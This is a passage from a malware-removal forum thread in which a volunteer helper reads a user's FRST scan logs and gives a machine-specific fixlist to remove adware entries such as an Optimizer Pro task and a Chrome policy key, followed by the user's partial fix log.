2014-10-16 18:00 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\LiveKernelReports
2014-10-16 14:15 - 2014-01-01 16:28 - 00000000 ____D () C:\AdwCleaner
2014-10-16 13:45 - 2013-10-05 13:02 - 00001169 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-16 13:45 - 2013-03-26 16:47 - 00001423 _____ () C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-16 11:13 - 2014-05-07 20:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 00:18 - 2013-07-26 10:21 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 00:18 - 2013-03-26 18:30 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-15 23:11 - 2013-03-31 13:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\Spotify
2014-10-15 16:14 - 2011-07-29 11:08 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Kirra's
2014-10-12 22:10 - 2014-03-06 10:57 - 00003636 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000
2014-10-10 11:45 - 2013-08-08 12:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
2014-10-08 16:29 - 2014-02-25 16:37 - 00002350 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-08 15:41 - 2014-07-03 20:30 - 00013312 ___SH () C:\Users\Mitey Fresh\Downloads\Thumbs.db
2014-10-02 17:52 - 2013-03-29 14:54 - 00002547 _____ () C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
2014-10-01 19:06 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-01 14:46 - 2009-07-14 16:32 - 00000000 ____D () C:\Windows\Offline Web Pages
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Malwarebytes
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-29 21:19 - 2013-03-28 16:08 - 433221317 _____ () C:\Windows\MEMORY.DMP
2014-09-29 21:19 - 2013-03-28 16:08 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 19:37 - 2013-04-29 18:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Skype
2014-09-25 09:42 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\rescache
2014-09-24 20:48 - 2013-03-27 17:06 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 20:48 - 2013-03-27 17:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-24 20:48 - 2013-03-27 17:06 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-22 17:42 - 2013-03-26 17:09 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-19 12:43 - 2013-05-28 17:24 - 00013824 _____ () C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-09-17 09:41 - 2013-12-30 10:48 - 00000000 ____D () C:\ProgramData\9922f00edb3be824
 
Some content of TEMP:
====================
C:\Users\Mitey Fresh\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-16 21:12
 
==================== End Of Log ============================
 
Here's the Addition.txt log:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by Mitey Fresh at 2014-10-17 08:49:28
Running from C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.9.0.1210 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.9.0.1210 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.07) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.0.112 - Adobe Systems, Inc.)
AGEIA PhysX v7.11.13 (HKLM-x32\...\{95FC26FB-19FD-4A96-BBB1-B1062E8648F5}) (Version: 7.11.13 - AGEIA Technologies, Inc.)
AUSkey software 1.4.4 (HKLM-x32\...\{24D37B30-83B4-46A7-A691-30F2FCEAE58E}) (Version: 1.4.4 - ABR)
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
calibre (HKLM-x32\...\{E0601182-5F00-4513-95D0-AFDCB7A0C658}) (Version: 1.41.0 - Kovid Goyal)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.48.1.0347 - Disc Soft Ltd)
ECI Client v6.0 (HKLM-x32\...\{DE730F37-A198-4112-A3B6-97786F34354A}) (Version: v6.0.1 - Australian Taxation Office)
Fallout 3 (HKLM-x32\...\{974C4B12-4D02-4879-85E0-61C95CC63E9E}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout New Vegas Ultimate Edition (HKLM-x32\...\Fallout New Vegas Ultimate Edition_is1) (Version:  - )
File Association Helper (HKLM\...\{C168639F-5810-4EC8-B1E8-0251AA8A771C}) (Version: 1.2.225.65451 - WinZip Computing International, LLC)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.117 - Google Inc.)
Google Drive (HKLM-x32\...\{418BAAD1-754D-48B4-B078-46EF4F25AF42}) (Version: 1.15.6556.8063 - Google, Inc.)
GoToMeeting 6.4.4.1831 (HKCU\...\GoToMeeting) (Version: 6.4.4.1831 - CitrixOnline)
iSkysoft Video Converter Ultimate(Build 5.4.1.0) (HKLM-x32\...\iSkysoft Video Converter Ultimate_is1) (Version: 5.4.1.0 - iSkysoft Software)
Java 7 Update 17 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417017FF}) (Version: 7.0.170 - Oracle)
Java 7 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217017FF}) (Version: 7.0.650 - Oracle)
Java Auto Updater (x32 Version: 2.1.65.20 - Oracle, Inc.) Hidden
Jing (HKLM-x32\...\{22800204-9E53-45C7-B6F3-5BB0F1C1A147}) (Version: 2.8.13007.1 - TechSmith Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Lost Via Domus (HKLM-x32\...\{2702B8FC-6003-4AC6-ADBC-EC65746D800A}) (Version: 1.0 - Ubisoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Corporation (Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Corporation (x32 Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{6965A8D2-465D-4F98-9FAA-0E9E2348F329}) (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{91110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Security Client (Version: 4.6.0305.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
MixPad (HKLM-x32\...\MixPad) (Version: 3.46 - NCH Software)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 28.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 28.0 (x86 en-US)) (Version: 28.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 28.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MTA:SA v1.3.5 (HKLM-x32\...\MTA:SA 1.3) (Version: v1.3.5 - Multi Theft Auto)
OutfoxTV (HKLM-x32\...\OutfoxTV) (Version:  - OutfoxTV)
Outlook Setup Tool (HKLM-x32\...\outlookset) (Version: 2.2.19 - Starfield Technologies)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
PhotoPad Image Editor (HKLM-x32\...\PhotoPad) (Version: 2.37 - NCH Software)
Pixillion Image Converter (HKLM-x32\...\Pixillion) (Version: 2.59 - NCH Software)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Spotify (HKCU\...\Spotify) (Version: 0.9.14.13.gba5645ad - Spotify AB)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 4.52 - NCH Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 5.55 - NCH Software)
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinZip 18.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E3}) (Version: 18.5.11111 - WinZip Computing, S.L. )
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2275511576-419542734-2349628481-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1440\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
 
==================== Restore Points  =========================
 
01-10-2014 08:15:32 Windows Update
06-10-2014 23:52:56 Windows Update
12-10-2014 10:55:58 Windows Update
15-10-2014 13:16:55 Windows Update
16-10-2014 00:00:18 Windows Update
16-10-2014 03:17:51 zoek.exe restore point
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 13:34 - 2009-06-11 08:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {34AB405F-5E82-4260-8A90-D62022C97303} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {56BB85DD-9856-431F-BB8B-DF90EFFBC782} - System32\Tasks\{B4A540EE-B703-4F88-8A36-0C4394E38292} => Chrome.exe 
Task: {92861FCA-C8BE-4844-97F1-D60C23CC1291} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {A1AB5C21-09B3-46F6-8BF3-B0507A0B83DE} - System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000 => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe [2014-10-12] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {CF7962CC-8917-4EFA-8CFD-8DF92989274A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EB35C775-29EC-49F9-B105-E54F44A3CD74} - System32\Tasks\{EBC5B4FF-C5FF-4433-9543-6D4208E88780} => Chrome.exe 
Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-04-08 16:35 - 2005-03-12 01:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2014-09-30 17:06 - 2013-08-23 14:36 - 00721263 _____ () C:\Windows\SysWOW64\ISCM64.dll
2012-01-10 21:12 - 2012-01-10 21:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 04060488 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppGoogleNaClPluginChrome.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT2
AlternateDataStreams: C:\Users\Mitey Fresh\Downloads\RE Contract.eml:OECustomProperty
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DelaypluginInstall => C:\ProgramData\iSkysoft\Video Converter Ultimate\DelayPluginI.exe
MSCONFIG\startupreg: iSkysoft Helper Compact.exe => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
MSCONFIG\startupreg: Jing => C:\Program Files (x86)\TechSmith\Jing\Jing.exe
MSCONFIG\startupreg: LifeCam => "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
MSCONFIG\startupreg: LogMeIn Hamachi Ui => "D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
MSCONFIG\startupreg: OutfoxTV => C:\Program Files\OutfoxTV\OutfoxTV\DesktopContainer.exe
MSCONFIG\startupreg: Spotify => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: VX1000 => C:\Windows\vVX1000.exe
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2275511576-419542734-2349628481-500 - Administrator - Disabled)
Guest (S-1-5-21-2275511576-419542734-2349628481-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2275511576-419542734-2349628481-1014 - Limited - Enabled)
Mitey Fresh (S-1-5-21-2275511576-419542734-2349628481-1000 - Administrator - Enabled) => C:\Users\Mitey Fresh
 
==================== Faulty Device Manager Devices =============
 
Name: Microsoft Virtual WiFi Miniport Adapter
Description: Microsoft Virtual WiFi Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
 
System errors:
=============
 
Microsoft Office Sessions:
=========================
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/17/2014 08:05:54 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
 
Error: (10/16/2014 02:01:58 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
 
 
==================== Memory info =========================== 
 
Processor: Intel® Pentium® CPU P6100 @ 2.00GHz
Percentage of memory in use: 42%
Total physical RAM: 3886.04 MB
Available physical RAM: 2253.66 MB
Total Pagefile: 7770.26 MB
Available Pagefile: 5884.64 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.39 GB) (Free:116.86 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Data) (Fixed) (Total:180.27 GB) (Free:117.47 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: DA22E49B)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#9
Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Hello,

 

I have a few questions for you. Are you located in the US or Australia? The reason I ask is that I see programs that are unfamiliar to US residents, but are common to Australia. I will look at them extra closely if you tell me that you live in the US and have no affiliation to Australia.

 

Next, before you run the fix, please open Chrome and then ensure that you've closed all the Chrome windows. Finally, close Chrome and then reboot the computer and then run the following fix.

 

Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

Press the Windows key + R on your keyboard at the same time. Type Notepad and click OK.

  • Copy the entire content of the codebox below and paste into the Notepad document:
    start
    
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    
    Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
    
    Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
    
    C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exeEmptyTemp:
    
    end
  • Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!


  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please post it when you reply.

 

 

Next, if the computer didn't reboot after the FRST fix, then please reboot it.

 

After the reboot, see if Chrome is working correctly.

 

In either case, please run OTL using these instructions.

 

Scan with OTL

Please download OTL by OldTimer and save the file to your desktop.
 

  • Right-click on the OTL icon and select Run as Administrator to start the tool.
  • Make sure that Scan All Users, LOP check and Purity check are ticked.
  • For 64-bit systems only - make sure that Include 64-bit option is also ticked.
  • Sections Processes, Modules, Services, Drivers, Standard Registry are set to Use Safelist.
  • Section Extra Registry is also set to Use Safelist.
  • Push Run Scan and wait patiently.
  • Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of both logfiles in your next reply.

 

 

To summarize, you should be posting the FRST fix log, the status of Chrome, the OTL.txt log and the Extras.txt log.



#10
awesomesauce

    Member

  • Topic Starter
  • 21 posts

Hi there,

 

Thanks for your reply.

 

Sorry I should have mentioned, I am located in Australia.

 

FRST Fix Log:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-10-2014
Ran by Mitey Fresh at 2014-10-22 14:05:03 Run:2
Running from C:\Users\Mitey Fresh\Desktop\Kirra's\Documents\Virus scans
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
start
 
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
 
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
 
C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exeEmptyTemp:
 
end
*****************
 
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB369F07-98C3-4487-BD8B-FDD287D8CEAE}" => Key deleted successfully.
